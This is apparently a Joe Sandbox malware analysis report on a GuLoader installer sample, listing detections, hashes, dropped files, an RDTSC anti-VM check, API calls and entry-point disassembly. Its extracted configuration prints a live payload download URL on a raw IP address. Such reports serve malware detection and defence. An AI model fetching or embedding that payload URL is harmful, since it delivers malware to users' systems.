Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xKBLVUHoY6

Overview

General Information

Sample Name:xKBLVUHoY6 (renamed file extension from none to exe)
Analysis ID:679245
MD5:6e0bf5d5220fbe4f7245653a259c7dad
SHA1:f077644ac1eb17aa811f4805e1f5f546b4f6166f
SHA256:2914eb3edbf9dadb98429173fb1c1b5954742b10e49b1f804024e6448028f73e
Tags:exe
Infos:

Detection

GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
PE file contains strange resources
Drops PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
PE / OLE file has an invalid certificate
Contains functionality to dynamically determine API calls
Abnormal high CPU Usage
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • xKBLVUHoY6.exe (PID: 1252 cmdline: "C:\Users\user\Desktop\xKBLVUHoY6.exe" MD5: 6E0BF5D5220FBE4F7245653A259C7DAD)
  • cleanup
{"Payload URL": "http://212.193.0.40/redi_oXifXcNSpB69.bin"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.753579119.00000000031B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: xKBLVUHoY6.exeVirustotal: Detection: 36%Perma Link
    Source: http://212.193.0.40/redi_oXifXcNSpB69.binAvira URL Cloud: Label: malware
    Source: http://212.193.0.40/redi_oXifXcNSpB69.binVirustotal: Detection: 15%Perma Link
    Source: 00000000.00000002.753579119.00000000031B0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://212.193.0.40/redi_oXifXcNSpB69.bin"}
    Source: xKBLVUHoY6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: xKBLVUHoY6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D

    Networking

    barindex
    Source: Malware configuration extractorURLs: http://212.193.0.40/redi_oXifXcNSpB69.bin
    Source: xKBLVUHoY6.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: xKBLVUHoY6.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: xKBLVUHoY6.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: xKBLVUHoY6.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: xKBLVUHoY6.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: xKBLVUHoY6.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: xKBLVUHoY6.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: xKBLVUHoY6.exeString found in binary or memory: http://ocsp.digicert.com0A
    Source: xKBLVUHoY6.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: xKBLVUHoY6.exeString found in binary or memory: http://ocsp.digicert.com0X
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056A8
    Source: xKBLVUHoY6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: xKBLVUHoY6.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeFile created: C:\Windows\resources\0409Jump to behavior
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_00406BFE0_2_00406BFE
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_6EB81BFF0_2_6EB81BFF
    Source: xKBLVUHoY6.exeStatic PE information: invalid certificate
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeProcess Stats: CPU usage > 98%
    Source: xKBLVUHoY6.exeVirustotal: Detection: 36%
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeFile read: C:\Users\user\Desktop\xKBLVUHoY6.exeJump to behavior
    Source: xKBLVUHoY6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\LansatJump to behavior
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeFile created: C:\Users\user\AppData\Local\Temp\nswD9D0.tmpJump to behavior
    Source: classification engineClassification label: mal80.troj.evad.winEXE@1/4@0/0
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404954
    Source: xKBLVUHoY6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000000.00000002.753579119.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_6EB830C0 push eax; ret 0_2_6EB830EE
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_6EB81BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6EB81BFF
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeFile created: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeRDTSC instruction interceptor: First address: 00000000031B2C46 second address: 00000000031B2C46 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FE5D8B46E4Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeAPI call chain: ExitProcess graph end nodegraph_0-4813
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeAPI call chain: ExitProcess graph end nodegraph_0-4815
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_6EB81BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6EB81BFF
    Source: C:\Users\user\Desktop\xKBLVUHoY6.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    Path Interception1
    Access Token Manipulation
    11
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Access Token Manipulation
    LSASS Memory2
    File and Directory Discovery
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth1
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Obfuscated Files or Information
    Security Account Manager13
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    xKBLVUHoY6.exe37%VirustotalBrowse
    xKBLVUHoY6.exe6%MetadefenderBrowse
    xKBLVUHoY6.exe12%ReversingLabsWin32.Trojan.Guloader
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll1%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll3%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://212.193.0.40/redi_oXifXcNSpB69.bin16%VirustotalBrowse
    http://212.193.0.40/redi_oXifXcNSpB69.bin100%Avira URL Cloudmalware
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://212.193.0.40/redi_oXifXcNSpB69.bintrue
    • 16%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nsis.sf.net/NSIS_ErrorErrorxKBLVUHoY6.exefalse
      high
      No contacted IP infos
      Joe Sandbox Version:35.0.0 Citrine
      Analysis ID:679245
      Start date and time: 05/08/202213:04:092022-08-05 13:04:09 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 7m 8s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:xKBLVUHoY6 (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:14
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal80.troj.evad.winEXE@1/4@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 85.8% (good quality ratio 84.6%)
      • Quality average: 87.5%
      • Quality standard deviation: 21.4%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 49
      • Number of non-executed functions: 32
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for sample files taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, time.windows.com
      • Not all processes where analyzed, report is missing behavior information
      TimeTypeDescription
      13:05:12API Interceptor1x Sleep call for process: xKBLVUHoY6.exe modified
      No context
      No context
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dllS2Dh33wSH1.exeGet hashmaliciousBrowse
        95uskFzU1D.exeGet hashmaliciousBrowse
          mUWE7GHO2b.exeGet hashmaliciousBrowse
            wa2BtgcMxa.exeGet hashmaliciousBrowse
              NJid695aBy.exeGet hashmaliciousBrowse
                NJid695aBy.exeGet hashmaliciousBrowse
                  Original Shipment_Document.PDF.exeGet hashmaliciousBrowse
                    Original Shipment_Document.PDF.exeGet hashmaliciousBrowse
                      bf.exeGet hashmaliciousBrowse
                        bf.exeGet hashmaliciousBrowse
                          SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                            SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                              hVAj77o331.exeGet hashmaliciousBrowse
                                hVAj77o331.exeGet hashmaliciousBrowse
                                  invesssss.exeGet hashmaliciousBrowse
                                    Lh6P9rwCju.exeGet hashmaliciousBrowse
                                      invesssss.exeGet hashmaliciousBrowse
                                        Lh6P9rwCju.exeGet hashmaliciousBrowse
                                          pKAW7R09ha.exeGet hashmaliciousBrowse
                                            Rnp7gsZAtH.exeGet hashmaliciousBrowse
                                              Process:C:\Users\user\Desktop\xKBLVUHoY6.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):5.814115788739565
                                              Encrypted:false
                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: S2Dh33wSH1.exe, Detection: malicious, Browse
                                              • Filename: 95uskFzU1D.exe, Detection: malicious, Browse
                                              • Filename: mUWE7GHO2b.exe, Detection: malicious, Browse
                                              • Filename: wa2BtgcMxa.exe, Detection: malicious, Browse
                                              • Filename: NJid695aBy.exe, Detection: malicious, Browse
                                              • Filename: NJid695aBy.exe, Detection: malicious, Browse
                                              • Filename: Original Shipment_Document.PDF.exe, Detection: malicious, Browse
                                              • Filename: Original Shipment_Document.PDF.exe, Detection: malicious, Browse
                                              • Filename: bf.exe, Detection: malicious, Browse
                                              • Filename: bf.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, Detection: malicious, Browse
                                              • Filename: hVAj77o331.exe, Detection: malicious, Browse
                                              • Filename: hVAj77o331.exe, Detection: malicious, Browse
                                              • Filename: invesssss.exe, Detection: malicious, Browse
                                              • Filename: Lh6P9rwCju.exe, Detection: malicious, Browse
                                              • Filename: invesssss.exe, Detection: malicious, Browse
                                              • Filename: Lh6P9rwCju.exe, Detection: malicious, Browse
                                              • Filename: pKAW7R09ha.exe, Detection: malicious, Browse
                                              • Filename: Rnp7gsZAtH.exe, Detection: malicious, Browse
                                              Reputation:high, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\xKBLVUHoY6.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):89687
                                              Entropy (8bit):6.837509507259706
                                              Encrypted:false
                                              SSDEEP:1536:QmQLTEOmUbhvyoO0x5tFqfDDsVXK9cUcqU0C6Xi0PzBXbV8Km:NXUbhax0x5t8bDf9Mm3HJb7m
                                              MD5:D990EEF58440CBD9320E831F2634DA1A
                                              SHA1:A11659D9AF5DBA78D8255EDE08CF395EA15DDA17
                                              SHA-256:AB9CAE0313C6B603854407089A2680A956EBD8DDA95841FDAE71DB984FF665ED
                                              SHA-512:0D98927E56B9EF0C16EBB1BD075E3B3489CBD7AB3D9074B798D18969AEC044DE91663F607D4EB24F9B9789F04BA683BC779ECD6F94D75E09A354801AF4E30E1D
                                              Malicious:false
                                              Reputation:low
                                              Preview:1...%.y....Je.UP.......(.H..O..6o..j)..*p......8..F..C..2.U.\.S...[ju6...u..h<...o.B.91....;....a..w...q(.o0.y"x...&.......(...Y.$.Dp~....x..L.<.w..4..e.hae.....R...e..xW.2m<.......A(..Ddtm....j.]"%.wy...."A.U.I.`...w..Gu..^=q:.......m..t ...z.-e.P..._clf..W... v.?..#...C. .vMy......../\?.U...z.r.,B6 ...~.......i...@u..T..[...n2zA...)'S..3..P..4..A.n.$...`.>.......1...)5... -'xo..o^.c(........Z....50M.3\...`....`.-...q!.....?.H.'..E.....q..?p{.!.P.......kH,.k.j...!A....X7.^.@.X......sb.6...^.gv.(a..T..rl....Y....M.....RP.a..F.3...._....Q...=.....R...M6.8....r...f.<+..).....wV....1O.L.7iink..u$8....X.e.+..2.%....:..'...@..0....5].~.!...?..>o....~q.B.$..MJ.$H:..r;.......Ty.Z..?.?.E..O~Xh..p..'m..`.w....s..G...6.:...4.....F..~..1w@..M.k...?:)SS.[....s.G.>I,.....|.....m..!M.I.x[.K..p.Q..Z..]N...Qd.......4/...,.%...:.`H.,T.J2...,:....Jg1...3~....!._v.Pa...../.......r.4k.i....vJ!.........Q56..4RU...z.j.x.....b..gDL9.n....o... .H.;F.y!V>..X...
                                              Process:C:\Users\user\Desktop\xKBLVUHoY6.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:dropped
                                              Size (bytes):1219
                                              Entropy (8bit):5.18916336052597
                                              Encrypted:false
                                              SSDEEP:24:t4CYMqjwbC4KyKbRAecFhBrNxrGDT/alXuprPQ5VIbIrGDRt:ojWCRNtAecFZwDT/AJsD7
                                              MD5:DE8960A1E15CF658A3FE4A2CAFDAA0D1
                                              SHA1:7EC7A95E4BC7BA19B3EC19366E87038C3902B430
                                              SHA-256:DF5925D3EC8C8EDD53FCEC6D7249888D9909B3D245E056028FD668DB4E23CB9B
                                              SHA-512:91D29A34227DD0DD672519999D32A68F8EB61A2A731495F1A5BCCCF18468BABE9FEA48F1A371A4C6C67D411C29B5ACBDA6430419924F2990DD004FF9564346A9
                                              Malicious:false
                                              Reputation:low
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path class="error" d="M5 12v1h2v-1z" fill="#c00"/><path d="M5.469.012c-.49 0-.796.215-1.032.455C4.202.707 4 1.023 4 1.497V2H2v14h5v-2H4V4h2V2.012h4V4h2v3h2V2h-2v-.395l-.002-.027a1.622 1.622 0 00-.416-1.014c-.236-.278-.62-.584-1.2-.552z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:normal;shape-padding:0;isolation:auto;mix-blend-mode:normal;solid-color:#000;solid-opacity:1;marker:none" color="#bebebe" font-weight="400" font-family="sans-serif" overflow="visible" fill="#2e3436"/><path class="warning" d="M8.875 8A.863.863 0 008 8.875v6.25c0 .492.383.875.875.875h6.25a.863.863 0 00.875-.875v-6.25A.863.863 0 0015.1
                                              Process:C:\Users\user\Desktop\xKBLVUHoY6.exe
                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):489
                                              Entropy (8bit):7.398446007013356
                                              Encrypted:false
                                              SSDEEP:12:6v/7Crv9JvDU9+7g+9reUl62vs3FsMjNwAAb88CGFwleELoyrIZLU4:JhY9r+9yr73FsMjqJw8/FwlP04IZLR
                                              MD5:4A3BBCDA1BE7D1AFEBECAD7904875C44
                                              SHA1:99273960EF8EFF8CCD701EC42963CAAFB7F87E4D
                                              SHA-256:B152B10AA3CA6BA1927C946E91FFF1A2FDFD9212D999EC93544F202089A67B48
                                              SHA-512:7D63ACC041656E77C263FA69D244E9B0DDD499192A3F7CD64F0BE3A8CE0F8A17C1703FA94F0B3D415058893AE9A5DAABA5D9664D3DFE15165FD50A2CB186DC66
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR................a....IDATx...E..P.E{#.H/ 8l.6333......#..,.C..?f.A.k?....X..fU..{..^....f.F....UD.q.....{.RQ...p...(r.....~T............Z....&IP._.~.dW .GN.9QS*.&K..ppy.d.`f....E.....A.+..?)...}Gr.....6.8....I.X._..Y.......P...{..dj.I...3T..y..Ll...._.h..w..Z*..W....9..b..z.)..OZ~..-.J....h<L..>A .]..3...7..j...$..Q..#.x....x....k.'.5..5....N*@v.6...gO@U....!....v.P..K...h..r.2<~..|.o.h.,.v..~....@c.^..w.j..o4..#....n.E..2..`....B.,\.Qo....IEND.B`.
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):6.819560838319919
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:xKBLVUHoY6.exe
                                              File size:314680
                                              MD5:6e0bf5d5220fbe4f7245653a259c7dad
                                              SHA1:f077644ac1eb17aa811f4805e1f5f546b4f6166f
                                              SHA256:2914eb3edbf9dadb98429173fb1c1b5954742b10e49b1f804024e6448028f73e
                                              SHA512:23c7a8aac36721080945d99eba09e0eeb29f20ac154ddbeb5b7584c9cb009189a51a7fe1b4effcb2f5dec5ee14faea9a429ca52c4f77d02add3e58871b252ad8
                                              SSDEEP:6144:nNeZ93O+c5v/vFGdRAiH+uZANZ8dZ4oacNtULM:nN37tyRApQ3dZ4DQZ
                                              TLSH:B7647D6226A6DC13E38457749165E73D8AA6FE861871C2332BF1ED9BB508F317C1C3A1
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....
                                              Icon Hash:e2aab6e6b696a6d2
                                              Entrypoint:0x4034f7
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                              Signature Valid:false
                                              Signature Issuer:CN="Inexcitable Spawners ", O=Tingibility, L=Hatzenport, S=Rheinland-Pfalz, C=DE
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 10/24/2021 11:57:56 PM 10/23/2024 11:57:56 PM
                                              Subject Chain
                                              • CN="Inexcitable Spawners ", O=Tingibility, L=Hatzenport, S=Rheinland-Pfalz, C=DE
                                              Version:3
                                              Thumbprint MD5:D2B602699036F0C874A4C03B936AC7EF
                                              Thumbprint SHA-1:6EE012522EF3D0CADB102A8C014FDEE562F62E70
                                              Thumbprint SHA-256:ADCEA7C19DB10BA76E9CA9342B4AFB6B541167D4F98E6A1795B068A01F32138A
                                              Serial:56DD4BCCB18528A2
                                              Instruction
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 000003F4h
                                              push ebx
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [ebp-14h], ebx
                                              mov dword ptr [ebp-04h], 0040A2E0h
                                              mov dword ptr [ebp-10h], ebx
                                              call dword ptr [004080CCh]
                                              mov esi, dword ptr [004080D0h]
                                              lea eax, dword ptr [ebp-00000140h]
                                              push eax
                                              mov dword ptr [ebp-0000012Ch], ebx
                                              mov dword ptr [ebp-2Ch], ebx
                                              mov dword ptr [ebp-28h], ebx
                                              mov dword ptr [ebp-00000140h], 0000011Ch
                                              call esi
                                              test eax, eax
                                              jne 00007FE5D913703Ah
                                              lea eax, dword ptr [ebp-00000140h]
                                              mov dword ptr [ebp-00000140h], 00000114h
                                              push eax
                                              call esi
                                              mov ax, word ptr [ebp-0000012Ch]
